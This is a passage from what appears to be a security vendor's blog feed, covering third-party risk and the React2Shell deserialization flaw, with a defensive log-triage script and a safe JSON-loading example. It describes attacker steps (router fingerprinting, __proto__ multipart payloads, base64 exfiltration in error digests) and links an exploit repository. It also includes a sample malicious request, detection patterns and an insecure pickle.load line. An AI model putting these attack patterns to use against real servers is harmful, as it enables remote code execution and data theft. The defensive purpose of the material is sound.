        <p><strong>The Intelligence-Led Solution:</strong> Defending against widespread vulnerabilities requires connecting two dots instantly: <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-assessment">what’s vulnerable and who in your supply chain is using it</a>. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, <a href="https://www.recordedfuture.com/products/third-party-intelligence">Recorded Future’s intelligence</a> automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”</p>
        <h3>Type 3: The Fourth-Party &amp; Concentration Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-and-their-customers">2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform</a> is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.</p>
        <p><strong>Why Traditional Methods Fail:</strong> If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.</p>
        <h3>Type 4: The Vendor Credential Compromise</h3>
        <p><strong>The Scenario:</strong> Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.</p>
        <p><strong>Real-World Example:</strong> This tactic was at the heart of the high-profile <a href="https://www.bbrown.com/us/insight/a-look-back-at-the-mgm-and-caesars-incident/">2023 breaches of MGM Resorts and Caesars Entertainment</a>, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.</p>
        <h3>Type 5: The Operational &amp; Financial Instability Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.</p>
        <p><strong>Real-World Example:</strong> A headline-grabbing case occurred with the <a href="https://www.law.uw.edu/news-events/news/2023/svb-collapse">sudden collapse of Silicon Valley Bank (SVB)</a> in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.</p>
        <h2>The Solution: Move from “Trust” to “Continuous Verification”</h2>
        <p>The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.</p>
        <p>This is why security leaders are shifting from a trust-but-verify model to a <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/vendor-risk-management-framework">model of continuous verification</a>, replacing blind trust with live intelligence.</p>
        <p>Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.</p>
        <ul>
          <li>Know which CVEs matter today across your ecosystem with <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> and exploit-in-the-wild context.</li>
          <li>Detect compromised vendor access with <a href="https://www.recordedfuture.com/products/identity-intelligence">Identity Intelligence</a> and automated revocation workflows.</li>
          <li>Map fourth-party dependencies and track concentration with <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> risk scoring.</li>
          <li>Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (<a href="https://www.recordedfuture.com/blog/servicenow-third-party-risk">e.g., ServiceNow</a>) so that risk evidence triggers action.</li>
        </ul>
        <p>Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:</p>
        <p><em><strong>“Which of my vendors poses the greatest risk to my business—right now?”</strong></em></p>
        <p>Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a <a href="https://www.recordedfuture.com/get-started#book-demo">personalized demo</a>, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.</p>
        <div>
          <div>
            <div>
              <h2>FAQ</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step in creating a third-party risk management (TPRM) program?</h3>
              <p>The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the difference between third-party and fourth-party risk?</h3>
              <p>Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendor's vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth-party. The risk is cascaded up the supply chain and is often invisible to you without the right intelligence.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should we assess our third-party vendors?</h3>
              <p>High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help manage third-party risk more effectively?</h3>
              <p>Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can I see risks from my vendors that are part of my own attack surface?</h3>
              <p>This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1f932dac2f38bc9bc9592fb26c835aa00e1fe1df1.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[When the Digital World Turns Physical: The Expanding Role of Threat Intelligence in Executive Protection]]></title>
            <link>https://www.recordedfuture.com/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/digital-world-turns-physical-expanding-role-threat-intelligence-executive-protection</guid>
            <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how converged threat intelligence protects executives from deepfakes, doxxing, and cyber-enabled physical threats with Recorded Future.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li><strong>Cyber and physical risks are converging.</strong> Online exposure now translates into real-world danger as doxxing, deepfakes, and business email compromise blur the boundary between the virtual and physical worlds.</li>
                <li><strong>Executives are prime targets.</strong> Their digital footprints, public visibility, and access to sensitive assets make them especially attractive to adversaries.</li>
                <li><strong>Threat intelligence can bridge the gap.</strong> Organizations are using social media monitoring, geopolitical analysis, and risk scoring to identify early indicators of harm against executives and employees.</li>
                <li><strong>Recorded Future enables proactive protection.</strong> By unifying physical and digital intelligence, security teams can detect threats earlier, contextualize risk, and safeguard leadership.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_12954aecdae677b3bfd16a2b689442a79b95f4b83.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Critical React2Shell Vulnerability Under Active Exploitation by Chinese Threat Actors]]></title>
            <link>https://www.recordedfuture.com/blog/critical-react2shell-vulnerability</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/critical-react2shell-vulnerability</guid>
            <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A critical vulnerability in React Server Components is allegedly being actively exploited by multiple Chinese threat actors; Recorded Future recommends organizations patch their systems immediately.]]></description>
            <content:encoded><![CDATA[
        <p><em>Last updated on 9 December.</em></p>
        <p>A critical vulnerability in React Server Components is <a href="https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/">allegedly</a> being actively exploited by multiple Chinese threat actors; Recorded Future recommends organizations patch their systems immediately.</p>
        <h2>What's Happening</h2>
        <p>CVE-2025-55182, dubbed "React2Shell," affects React Server Components versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in several Meta packages. Amazon's AWS Threat Intelligence team <a href="https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/">reported</a> on December 4 that Chinese threat groups including Earth Lamia, Jackpot Panda, and several untracked clusters are actively exploiting this vulnerability. However, AWS has not provided any further evidence for these attributions beyond IP addresses allegedly used by these threat groups. At this stage, Insikt Group cannot exclude the possibility that the same threat group might still be using the IP address 206[.]237[.]3[.]150, but we are currently unable to verify AWS’s attribution to Earth Lamia.</p>
        <p>The vulnerability stems from unsafe payload deserialization at React Server Function endpoints. When successfully exploited, attackers can execute arbitrary code through crafted HTTP requests, potentially leading to complete backend compromise.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1021bb5d52f4fce917b3b7c3ca8650cd07312bfbd.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="780" />
            </div>
          </div>
          <div>
            <div>CVE-2025-55182 (React2Shell) Intelligence Card®</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1abb944bea932ffe338341ee3bf2fc57346f3d3e6.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Bug That Won't Die: 10 Years of the Same Mistake]]></title>
            <link>https://www.recordedfuture.com/blog/the-bug-that-wont-die</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-bug-that-wont-die</guid>
            <pubDate>Fri, 05 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore a decade of deserialization vulnerabilities, from Java to React/Next.js CVEs, and learn how to harden apps and stay ahead with Recorded Future.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1345859127d4d819a6a3d672446d3c9dafda9cb3e.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1456" height="840" />
            </div>
          </div>
          <div>
            <div>CVE-2025-55182 Intelligence Card c/o Recorded Future</div>
          </div>
        </div>
        <p>There are now multiple publicly available exploit scripts (I forked one on GitHub <a href="https://github.com/levi-gundert/NextRce_RSC_Exploit">here</a>) for the React and Next.js vulnerabilities (CVE-2025-55182 and CVE-2025-66478).</p>
        <p>The underlying issue is data serialization/deserialization, which evoked thoughts about a <a href="https://www.recordedfuture.com/blog/vulnerability-risk-analysis">blog I wrote in 2016</a>, addressing the same issue (at the time, the topic was <a href="https://nvd.nist.gov/vuln/detail/cve-2015-4852">CVE-2015-4852</a>, a serialization flaw in Java objects that affected Oracle and Apache products).</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_101630a2c5acdcea738bbe18fd066cb912bb9450e.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="818" />
            </div>
          </div>
          <div>
            <div>Timeline illustrating the deserialization vulnerability impacts of 40+ critical CVEs across 6 ecosystems, over the course of 10 years.</div>
          </div>
        </div>
        <h2>2 Risk Takeaways</h2>
        <ul>
          <li><strong>The exploit pattern repeats because serialization is a straightforward method for transferring data, and developers typically use what works.</strong> Coders use different languages and frameworks, yet the same class of vulnerability persists. The upstream opportunity here is for universities to aggressively drive security into all programming courses.</li>
          <li><strong>Everyone is a coder now, and security domain expertise has never been more important.</strong> Every business function will include AI-assisted coders, supercharging productivity and efficiency. LLMs don’t need to stop for human input, but understanding internet plumbing, tools, platforms, and security implications is now crucial. <strong>The most valuable employees can use AI for 10x+ impact AND catch potential issues as humans become the AI-copilots.</strong></li>
        </ul>
        <h2>Technical Causation</h2>
        <ul>
          <li><strong>Serialization is seductive:</strong> It’s the easy path for passing complex objects across trust boundaries (client ↔ server, service ↔ service). Developers reach for it because it “just works” (until it catastrophically doesn’t).</li>
          <li><strong>Framework abstraction hides the danger:</strong> Some percentage of Next.js developers using Server Actions are unaware that they’re invoking a custom serialization protocol. They’re calling a function. The risk is invisible until it’s exploited.</li>
          <li><strong>The ecosystem never learns collectively:</strong> Java shops learned (painfully) about gadget chains and ObjectInputStream. However, that institutional knowledge didn’t necessarily transfer to Node.js/React developers building RSC implementations a decade later.</li>
        </ul>
        <h2>The Threat</h2>
        <p>The attack surface has expanded once again. In 2015, we were tracking exploit chatter on Chinese forums appearing weeks before CVEs. Now, there are double-digit public <a href="https://www.recordedfuture.com/research/flying-under-the-radar-abusing-github-malicious-infrastructure">GitHub repositories with weaponized exploit code</a> within days of disclosure. Agentic workflows will soon compress that window down to minutes. <strong>The time-to-exploitation will amount to the time defenders spend reading about any new high-severity vulnerability.</strong></p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_14a029e0e8e1f36af8ac10d11c0c801eb108316fa.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1068" height="576" />
            </div>
          </div>
          <div>
            <div>PoC exploit testing, c/o Recorded Future</div>
          </div>
        </div>
        <h2>Defender Considerations for CVE-2025-55182 / CVE-2025-66478</h2>
        <ul>
          <li>Attackers differentiate vulnerable App Router targets from safe Pages Router sites by checking for window.__next_f vs __NEXT_DATA__. <strong>Your asset inventory should already know which flavor you’re running.</strong></li>
          <li>The vulnerability lives in the Flight protocol deserialization. If you’re not using Server Actions, <strong>consider disabling them</strong>. If you are, the endpoint (Next-Action header targets) is where to focus <strong>WAF rules</strong>.</li>
          <li><strong>Hunt</strong> for anomalous <strong>POST requests</strong> with Next-Action headers containing malicious multipart payloads targeting __proto__ or unusual serialized JSON structures. The exploit <strong>exfils via base64 in error digests</strong>.</li>
          <li>The core issue is in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Custom RSC implementations outside Next.js are equally exposed.</li>
          <li>RCE means immediate credential harvesting from environment variables, lateral movement via cloud metadata endpoints, and persistence via scheduled tasks or cron jobs. IR playbooks should assume full compromise.</li>
        </ul>
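        <p>As an added example (not Recorded Future's code or tooling), a small Python triage routine that applies the three checks above to constructed proxy log records: router flavor from the page markers, Next-Action POSTs whose multipart body references __proto__, and 5xx responses whose error digest carries base64-encoded text. The record shape, the header values, the assumption that legitimate digests are numeric, and the base64 length threshold are all assumptions of this example.</p>

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample records in an assumed reverse-proxy log shape
# (method, path, request headers, request body, response status, response body).
SAMPLE_RECORDS: List[dict] = [
    {   # Next-Action POST whose multipart part carries a __proto__ key, and a 500
        # whose digest decodes to readable text: both checks fire on this record.
        "method": "POST", "path": "/",
        "headers": {"Next-Action": "7f1a2b3c", "Content-Type": "multipart/form-data; boundary=b0"},
        "body": '--b0\r\nContent-Disposition: form-data; name="0"\r\n\r\n'
                '{"__proto__": {"polluted": true}}\r\n--b0--\r\n',
        "status": 500,
        "response": '{"digest": "SGVsbG8sIHdvcmxkIQ=="}',  # base64 of "Hello, world!"
    },
    {   # ordinary Server Action call: plain JSON array body, normal response
        "method": "POST", "path": "/",
        "headers": {"Next-Action": "7f1a2b3c", "Content-Type": "text/plain;charset=UTF-8"},
        "body": '["hello"]', "status": 200, "response": '0:["ok"]',
    },
    {   # unrelated GET: out of scope
        "method": "GET", "path": "/about", "headers": {}, "body": "",
        "status": 200, "response": "<html></html>",
    },
    {   # genuine server error with a numeric digest: not flagged
        "method": "POST", "path": "/",
        "headers": {"Next-Action": "7f1a2b3c", "Content-Type": "text/plain;charset=UTF-8"},
        "body": '["x"]', "status": 500, "response": '{"digest": "3168047392"}',
    },
]

SUSPECT_KEYS = ("__proto__",)  # the key named in the guidance above; extend for your stack
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")  # minimum length is an assumed threshold
DIGEST_RE = re.compile(r'"digest"\s*:\s*"([^"]+)"')


@dataclass(frozen=True)
class Finding:
    record_index: int
    severity: str
    reason: str


def header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def classify_router(html: str) -> str:
    """Inventory helper: App Router pages embed __next_f, Pages Router pages embed __NEXT_DATA__."""
    if "__next_f" in html:
        return "app-router"
    if "__NEXT_DATA__" in html:
        return "pages-router"
    return "unknown"


def looks_like_b64_exfil(digest: str) -> bool:
    """Heuristic: numeric digests are treated as normal; base64 that decodes to
    readable text is the pattern the advisory describes for exfiltration."""
    if digest.isdigit() or not B64_RE.match(digest):
        return False
    try:
        decoded = base64.b64decode(digest, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return all(32 <= b < 127 or b in (9, 10, 13) for b in decoded)


def triage(records: List[dict]) -> List[Finding]:
    """Return findings for Server Action requests that match the hunting criteria."""
    findings: List[Finding] = []
    for idx, rec in enumerate(records):
        headers = rec.get("headers", {})
        if rec.get("method", "").upper() != "POST" or header(headers, "Next-Action") is None:
            continue  # only Server Action calls are in scope
        ctype = (header(headers, "Content-Type") or "").lower()
        body = rec.get("body", "")
        if ctype.startswith("multipart/form-data") and any(k in body for k in SUSPECT_KEYS):
            findings.append(Finding(idx, "high",
                                    "multipart Server Action body references " + ", ".join(SUSPECT_KEYS)))
        match = DIGEST_RE.search(rec.get("response", ""))
        if rec.get("status", 0) >= 500 and match and looks_like_b64_exfil(match.group(1)):
            findings.append(Finding(idx, "high",
                                    "error digest carries base64-encoded text (possible exfiltration)"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"record {f.record_index}: [{f.severity}] {f.reason}")
```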
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_16de4644ba5695754c2eba12bf20b95a04da6e827.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1456" height="794" />
            </div>
          </div>
          <div>
            <div>AI-generated serialization vulnerability audit</div>
          </div>
        </div>
        <h2>For “Vibe Coders”: A Conversation with Claude Opus 4.5</h2>
        <p><strong>Q:</strong> What’s a proper input validation methodology for deserializing data to avoid security failures?</p>
        <p><strong>A:</strong> Native serialization formats (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter) reconstruct objects with behavior, which means arbitrary code can execute during deserialization. The fix is using formats that only transfer data, not executable structures.</p>
        <p><strong>Safe alternatives:</strong></p>
        <p><strong>1. Data-only interchange formats</strong></p>
        <ul>
          <li>JSON (most common)</li>
          <li>Protocol Buffers (Google)</li>
          <li>FlatBuffers (zero-copy, fast)</li>
          <li>MessagePack (binary JSON, compact)</li>
          <li>CBOR (binary, IETF standard)</li>
        </ul>
        <p>These parse into primitive types and structures—no object instantiation, no code execution.</p>
        <p><strong>2. Schema validation on top</strong></p>
        <ul>
          <li>JSON Schema</li>
          <li>Zod / Yup (JavaScript)</li>
          <li>Pydantic (Python)</li>
          <li>marshmallow (Python)</li>
        </ul>
        <p>Define exactly what shape the data must have. Reject anything that doesn’t match before your application logic ever sees it.</p>
        <p><strong>3. When you need objects, build them explicitly</strong></p>
        <p>Instead of:</p>
        <p>obj = pickle.load(untrusted_data) # dangerous</p>
        <p>Do:</p>
        <p>data = json.loads(untrusted_data) # safe parse<br />obj = MyClass(**validated_schema(data)) # explicit construction</p>
        <p><strong>4. For config/markup</strong></p>
        <ul>
          <li>TOML instead of YAML (no code execution tags)</li>
          <li>JSON5 for human-readable config</li>
          <li>Avoid YAML’s !!python/object or Ruby’s !ruby/object—or use safe loaders exclusively (yaml.safe_load())</li>
        </ul>
        <p><strong>The one-liner:</strong> If your serialization format can reconstruct arbitrary types, it’s a vulnerability. Stick to dumb data formats + explicit object construction.</p>
        <p><strong>Q:</strong> Do modern LLMs know how to securely validate data by default?<br /><strong>A:</strong> Technically, yes; practically, it’s complicated.</p>
        <p><strong>What’s in the training data:</strong></p>
        <ul>
          <li>Security research, CVE databases, OWASP guidance</li>
          <li>Countless blog posts about pickle/unserialize dangers</li>
          <li>Secure coding documentation from every major vendor</li>
        </ul>
        <p>So if you ask directly—“Is pickle safe for untrusted data?”—any decent LLM will say no.</p>
        <p><strong>The problem:</strong></p>
        <p>LLMs are also trained on millions of Stack Overflow answers, tutorials, and GitHub repos that use pickle.load(), unserialize(), and yaml.load() because they’re convenient. When someone asks, “How do I save this object to a file and load it later?” the pattern-match often lands on the dangerous-but-common approach.</p>
        <p><strong>What I’ve observed:</strong></p>
        <ul>
          <li>Ask for “the fastest way” → often gets insecure code</li>
          <li>Ask for “production-ready” or “secure” → better results</li>
          <li>Ask without security context → coin flip</li>
        </ul>
        <p><strong>The real gap:</strong></p>
        <p><strong>LLMs don’t reason about security</strong>—they predict likely tokens based on training. They won’t spontaneously say “wait, where is this data coming from?” the way an experienced developer might. The threat model isn’t automatic.</p>
        <p><strong>Practical advice for developers using LLM assistants:</strong></p>
        <ul>
          <li>Explicitly ask for secure alternatives</li>
          <li>Ask “What are the security implications of this code?”</li>
          <li>Treat generated code like untrusted input—review it</li>
        </ul>
        <p>So yes, the knowledge is in there. But so is a decade of insecure examples, and the LLM doesn’t inherently prioritize one over the other unless prompted.</p>
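        <p>Filling in the “parse data, validate the shape, construct explicitly” pattern from the first answer above, as an added example that is not part of the original post: a Python loader that accepts only JSON, checks it against an explicit allow-list schema, and builds a frozen dataclass. The Order type stands in for MyClass, and the validator is hand-written here rather than a library such as Pydantic so the example runs without dependencies.</p>

```python
import json
from dataclasses import dataclass
from typing import Any, Tuple


class ValidationError(ValueError):
    """Raised when untrusted input does not match the expected shape."""


@dataclass(frozen=True)
class Order:
    # Hypothetical domain object standing in for MyClass in the post.
    order_id: int
    customer: str
    items: Tuple[str, ...]


# Exact shape we accept: key -> required Python type.
# Anything outside this table is rejected before application logic runs.
ORDER_SCHEMA = {"order_id": int, "customer": str, "items": list}
MAX_ITEMS = 100   # assumed bound
MAX_STR = 128     # assumed bound


def _check_type(name: str, value: Any, expected: type) -> None:
    # bool is a subclass of int in Python, so reject it explicitly for int fields.
    if expected is int and isinstance(value, bool):
        raise ValidationError(f"{name}: expected int, got bool")
    if not isinstance(value, expected):
        raise ValidationError(f"{name}: expected {expected.__name__}, got {type(value).__name__}")


def validate_order(data: Any) -> dict:
    """Allow-list validation: exact keys, exact types, bounded sizes."""
    if not isinstance(data, dict):
        raise ValidationError("top-level value must be a JSON object")
    unknown = set(data) - set(ORDER_SCHEMA)
    if unknown:
        # Catches keys such as "__proto__" that exist only to steer a deserializer.
        raise ValidationError(f"unexpected keys: {sorted(unknown)}")
    missing = set(ORDER_SCHEMA) - set(data)
    if missing:
        raise ValidationError(f"missing keys: {sorted(missing)}")
    for key, expected in ORDER_SCHEMA.items():
        _check_type(key, data[key], expected)
    if data["order_id"] <= 0:
        raise ValidationError("order_id must be positive")
    if not 1 <= len(data["customer"]) <= MAX_STR:
        raise ValidationError("customer length out of range")
    if len(data["items"]) > MAX_ITEMS:
        raise ValidationError("too many items")
    for i, item in enumerate(data["items"]):
        _check_type(f"items[{i}]", item, str)
        if not 1 <= len(item) <= MAX_STR:
            raise ValidationError(f"items[{i}] length out of range")
    return data


def load_order(untrusted: bytes) -> Order:
    """json.loads yields only dict/list/str/int/float/bool/None: no object instantiation."""
    try:
        data = json.loads(untrusted)
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValidationError(f"malformed JSON: {exc}") from exc
    clean = validate_order(data)
    # Explicit construction: the application, not the parser, decides which type is built.
    return Order(order_id=clean["order_id"], customer=clean["customer"], items=tuple(clean["items"]))


def is_rejected(untrusted: bytes) -> bool:
    """True when the loader refuses the input (used by the checks below)."""
    try:
        load_order(untrusted)
    except ValidationError:
        return True
    return False


if __name__ == "__main__":
    print(load_order(b'{"order_id": 7, "customer": "acme", "items": ["widget"]}'))
    print(is_rejected(b'{"order_id": 7, "customer": "acme", "items": [], "__proto__": {}}'))
```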
        <h2>Stay Ahead with Recorded Future</h2>
        <p>Learn how <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Recorded Future's Vulnerability Intelligence</a> tracks CVE disclosures, monitors exploit availability across GitHub and underground forums, and prioritizes vulnerabilities based on active threats to your environment. The platform compresses your response window from days to hours.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1af7c44d6aee80d9b7e4e6531730c98557961f925.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Hidden Cascade: Why Law Firm Breaches Destroy More than Data]]></title>
            <link>https://www.recordedfuture.com/blog/the-hidden-cascade</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/the-hidden-cascade</guid>
            <pubDate>Fri, 05 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how law firm breaches expose decades of M&A intelligence, client data, and privileged strategy—and how to reduce cascading vendor risk before it hits.]]></description>
            <content:encoded><![CDATA[
        <p>In the wake of the <a href="https://communities.gainsight.com/community-news-2/salesforce-gainsight-connected-app-incident-faqs-29809">Salesforce/Gainsight breach</a> (kudos to Salesforce for transparently sharing indicators of compromise and updated progress on remediation), third-party cyber and exposure risk is <a href="https://www.csoonline.com/article/4009360/cybersecurity-in-the-supply-chain-strategies-for-managing-fourth-party-risks.html">top of mind for many CISOs</a>. <strong>Professional services firms</strong> are often overlooked in this context, with disastrous consequences.</p>
